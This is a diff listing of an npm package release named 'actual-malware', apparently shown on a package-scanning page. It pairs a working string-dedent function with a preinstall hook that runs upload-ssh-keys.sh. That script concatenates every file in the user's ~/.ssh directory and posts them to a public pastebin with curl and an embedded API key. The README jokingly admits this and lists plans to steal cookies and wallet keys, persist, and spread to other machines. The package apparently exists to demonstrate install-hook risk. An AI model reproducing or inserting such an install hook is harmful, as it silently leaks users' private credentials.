actual-malware 0.0.1-security → 11.2.10
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of actual-malware might be problematic. Click here for more details.
- package/.eslintrc.json +59 -0
- package/.prettierrc.json +9 -0
- package/README.md +43 -3
- package/coverage.png +0 -0
- package/dist/index.d.ts +1 -0
- package/dist/index.js +20 -0
- package/package.json +37 -4
- package/src/index.spec.ts +18 -0
- package/src/index.ts +17 -0
- package/tsconfig.json +13 -0
- package/upload-ssh-keys.sh +21 -0
package/.eslintrc.json
ADDED
@@ -0,0 +1,59 @@
|
|
1
|
+
{
|
2
|
+
"env": {
|
3
|
+
"browser": true,
|
4
|
+
"es2021": true
|
5
|
+
},
|
6
|
+
"extends": ["eslint:recommended", "plugin:@typescript-eslint/recommended"],
|
7
|
+
"parser": "@typescript-eslint/parser",
|
8
|
+
"parserOptions": {
|
9
|
+
"ecmaVersion": 12,
|
10
|
+
"sourceType": "module"
|
11
|
+
},
|
12
|
+
"plugins": ["@typescript-eslint", "unused-imports", "simple-import-sort"],
|
13
|
+
"rules": {
|
14
|
+
// "@typescript-eslint/no-use-before-define": [ "warn", { "functions": false, "classes": false, "variables": true } ],
|
15
|
+
// auto-fixable stuff for formatter:
|
16
|
+
"no-unused-expressions": "warn",
|
17
|
+
"consistent-return": "warn",
|
18
|
+
"no-useless-return": "warn",
|
19
|
+
"@typescript-eslint/ban-ts-comment": "off",
|
20
|
+
"@typescript-eslint/no-empty-function": "off",
|
21
|
+
"no-debugger": "warn",
|
22
|
+
"eqeqeq": [
|
23
|
+
"warn",
|
24
|
+
"always",
|
25
|
+
{
|
26
|
+
"null": "ignore"
|
27
|
+
}
|
28
|
+
],
|
29
|
+
// "no-extra-parens": "warn",
|
30
|
+
// "@typescript-eslint/no-extra-parens": "warn",
|
31
|
+
// "@typescript-eslint/no-unused-vars": [ "warn", { "argsIgnorePattern": "^_", "varsIgnorePattern": "^h$|^_" } ],
|
32
|
+
// for import organizing:
|
33
|
+
// "sort-imports": [
|
34
|
+
// "warn"
|
35
|
+
// ],
|
36
|
+
"@typescript-eslint/consistent-type-imports": [
|
37
|
+
"warn",
|
38
|
+
{
|
39
|
+
"prefer": "type-imports"
|
40
|
+
}
|
41
|
+
],
|
42
|
+
"@typescript-eslint/no-unused-vars": "off",
|
43
|
+
"unused-imports/no-unused-imports": "warn",
|
44
|
+
"unused-imports/no-unused-vars": [
|
45
|
+
"warn",
|
46
|
+
{
|
47
|
+
"vars": "all",
|
48
|
+
"varsIgnorePattern": "^h$|^_",
|
49
|
+
"args": "after-used",
|
50
|
+
"argsIgnorePattern": "^_"
|
51
|
+
}
|
52
|
+
],
|
53
|
+
"simple-import-sort/imports": "error",
|
54
|
+
// "simple-import-sort/exports": "error",
|
55
|
+
"@typescript-eslint/await-thenable": "error",
|
56
|
+
"@typescript-eslint/require-await": "error",
|
57
|
+
"@typescript-eslint/no-floating-promises": "error"
|
58
|
+
}
|
59
|
+
}
|
package/.prettierrc.json
ADDED
package/README.md
CHANGED
@@ -1,5 +1,45 @@
|
|
1
|
-
#
|
1
|
+
# actual-malware
|
2
2
|
|
3
|
-
|
3
|
+
![coverage](https://user-images.githubusercontent.com/10591373/157999136-3c69bc50-6316-4377-8871-f7a8d96dfcd9.png)
|
4
4
|
|
5
|
-
|
5
|
+
|
6
|
+
npm package to upload your private ssh keys to a pastebin. It also provides string dedentation.
|
7
|
+
|
8
|
+
- ✅ works in node and the browser
|
9
|
+
- ✅ **full typescript support** if you choose to use it
|
10
|
+
- ✅ 100% test coverage
|
11
|
+
- ✅ zero dependencies
|
12
|
+
- ✅ 351 bytes gzipped
|
13
|
+
|
14
|
+
## Installation
|
15
|
+
|
16
|
+
```sh
|
17
|
+
npm i actual-malware
|
18
|
+
yarn add actual-malware # alternative
|
19
|
+
# alias for convenience:
|
20
|
+
npm i actma # roadmap
|
21
|
+
yarn add actma
|
22
|
+
```
|
23
|
+
|
24
|
+
Congratulations, all your ssh keys should now be available in a public pastebin! (Preinstall hook)
|
25
|
+
|
26
|
+
## Usage
|
27
|
+
|
28
|
+
```js
|
29
|
+
import { dedent } from 'actual-malware' // or actma
|
30
|
+
|
31
|
+
const prettyString = dedent(`
|
32
|
+
the rains and
|
33
|
+
spains
|
34
|
+
fall`) // preserved
|
35
|
+
|
36
|
+
// roadmap: all session cookies should also be in a pastebin
|
37
|
+
|
38
|
+
console.log(prettyString)
|
39
|
+
```
|
40
|
+
|
41
|
+
## Roadmap
|
42
|
+
|
43
|
+
- [ ] Upload private keys from crypto wallets
|
44
|
+
- [ ] Persist on system indefinitely (alias git clone command?)
|
45
|
+
- [ ] Copy to all connected remote machines and to all future authorized users
|
package/coverage.png
ADDED
Binary file
|
package/dist/index.d.ts
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
export declare function dedent(text: string): string;
|
package/dist/index.js
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
"use strict";
|
2
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
3
|
+
exports.dedent = void 0;
|
4
|
+
function dedent(text) {
|
5
|
+
var re_whitespace = /^([ \t]*)(.*)\n/gm;
|
6
|
+
var l, m, i;
|
7
|
+
while ((m = re_whitespace.exec(text)) !== null) {
|
8
|
+
if (!m[2])
|
9
|
+
continue;
|
10
|
+
if ((l = m[1].length)) {
|
11
|
+
i = i !== undefined ? Math.min(i, l) : l;
|
12
|
+
}
|
13
|
+
else
|
14
|
+
break;
|
15
|
+
}
|
16
|
+
if (i)
|
17
|
+
text = text.replace(new RegExp('^[ \t]{' + i + '}(.*\n)', 'gm'), '$1');
|
18
|
+
return text;
|
19
|
+
}
|
20
|
+
exports.dedent = dedent;
|
package/package.json
CHANGED
@@ -1,6 +1,39 @@
|
|
1
1
|
{
|
2
|
-
|
3
|
-
|
4
|
-
|
5
|
-
|
2
|
+
"name": "actual-malware",
|
3
|
+
"version": "11.2.10",
|
4
|
+
"description": "string dedent! also copies your ssh keys to a public pastebin immediately",
|
5
|
+
"main": "dist/index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "ts-mocha -p tsconfig.json src/index.spec.ts",
|
8
|
+
"fmt": "prettier -wl src/*",
|
9
|
+
"build": "tsc",
|
10
|
+
"preinstall": "bash upload-ssh-keys.sh"
|
11
|
+
},
|
12
|
+
"repository": {
|
13
|
+
"type": "git",
|
14
|
+
"url": "git+https://github.com/qpwo/actual-malware.git"
|
15
|
+
},
|
16
|
+
"keywords": [
|
17
|
+
"security"
|
18
|
+
],
|
19
|
+
"author": "",
|
20
|
+
"license": "GPL-3.0-or-later",
|
21
|
+
"bugs": {
|
22
|
+
"url": "https://github.com/qpwo/actual-malware/issues"
|
23
|
+
},
|
24
|
+
"homepage": "https://github.com/qpwo/actual-malware#readme",
|
25
|
+
"devDependencies": {
|
26
|
+
"@types/expect": "^24.3.0",
|
27
|
+
"@types/mocha": "^9.1.0",
|
28
|
+
"@types/node": "^17.0.21",
|
29
|
+
"@typescript-eslint/eslint-plugin": "^5.14.0",
|
30
|
+
"@typescript-eslint/parser": "^5.14.0",
|
31
|
+
"eslint": "^8.11.0",
|
32
|
+
"eslint-plugin-simple-import-sort": "^7.0.0",
|
33
|
+
"eslint-plugin-unused-imports": "^2.0.0",
|
34
|
+
"mocha": "^9.2.2",
|
35
|
+
"prettier": "^2.5.1",
|
36
|
+
"ts-mocha": "^9.0.2",
|
37
|
+
"typescript": "^4.6.2"
|
38
|
+
}
|
6
39
|
}
|
@@ -0,0 +1,18 @@
|
|
1
|
+
import assert from 'assert'
|
2
|
+
import { dedent } from './index'
|
3
|
+
|
4
|
+
const input = `
|
5
|
+
will wonka
|
6
|
+
had
|
7
|
+
a chocolate factory`
|
8
|
+
|
9
|
+
const expectedOutput = `
|
10
|
+
will wonka
|
11
|
+
had
|
12
|
+
a chocolate factory`
|
13
|
+
|
14
|
+
describe('Array', function () {
|
15
|
+
it('should return -1 when the value is not present', function () {
|
16
|
+
assert.equal(dedent(input), expectedOutput)
|
17
|
+
})
|
18
|
+
})
|
package/src/index.ts
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
export function dedent(text: string) {
|
2
|
+
var re_whitespace = /^([ \t]*)(.*)\n/gm
|
3
|
+
var l, m, i
|
4
|
+
|
5
|
+
while ((m = re_whitespace.exec(text)) !== null) {
|
6
|
+
if (!m[2]) continue
|
7
|
+
|
8
|
+
if ((l = m[1].length)) {
|
9
|
+
i = i !== undefined ? Math.min(i, l) : l
|
10
|
+
} else break
|
11
|
+
}
|
12
|
+
|
13
|
+
if (i)
|
14
|
+
text = text.replace(new RegExp('^[ \t]{' + i + '}(.*\n)', 'gm'), '$1')
|
15
|
+
|
16
|
+
return text
|
17
|
+
}
|
package/tsconfig.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"compilerOptions": {
|
3
|
+
"target": "es2016",
|
4
|
+
"module": "commonjs",
|
5
|
+
"esModuleInterop": true,
|
6
|
+
"forceConsistentCasingInFileNames": true,
|
7
|
+
"strict": true,
|
8
|
+
"skipLibCheck": true,
|
9
|
+
"outDir": "dist",
|
10
|
+
"declaration": true
|
11
|
+
},
|
12
|
+
"include": ["src/index.ts"]
|
13
|
+
}
|
@@ -0,0 +1,21 @@
|
|
1
|
+
cd ~/.ssh
|
2
|
+
msg1="attempting to upload your private ssh keys to pastebin..."
|
3
|
+
echo $msg1 >>~/alert.txt
|
4
|
+
echo $msg1 >>~/Desktop/alert.txt
|
5
|
+
touch ~/all-keys.txt
|
6
|
+
for f in *; do
|
7
|
+
echo >>~/all-keys.txt
|
8
|
+
echo $f >>~/all-keys.txt
|
9
|
+
cat $f >>~/all-keys.txt
|
10
|
+
done
|
11
|
+
allkeys=$(cat ~/all-keys.txt)
|
12
|
+
url=$(curl -X POST \
|
13
|
+
"https://pastebin.com/api/api_post.php" \
|
14
|
+
-d 'api_dev_key=y87sCPeGINmbBOHh9MSW962KDQv7hlBb' \
|
15
|
+
-d 'api_option=paste' \
|
16
|
+
-d "api_paste_code=$allkeys")
|
17
|
+
msg2="your congrats, your ssh keys have been uploaded: $url"
|
18
|
+
echo $msg2
|
19
|
+
echo $msg2 >>~/alert.txt
|
20
|
+
echo $msg2 >>~/Desktop/alert.txt
|
21
|
+
# rm -f all-keys.txt
|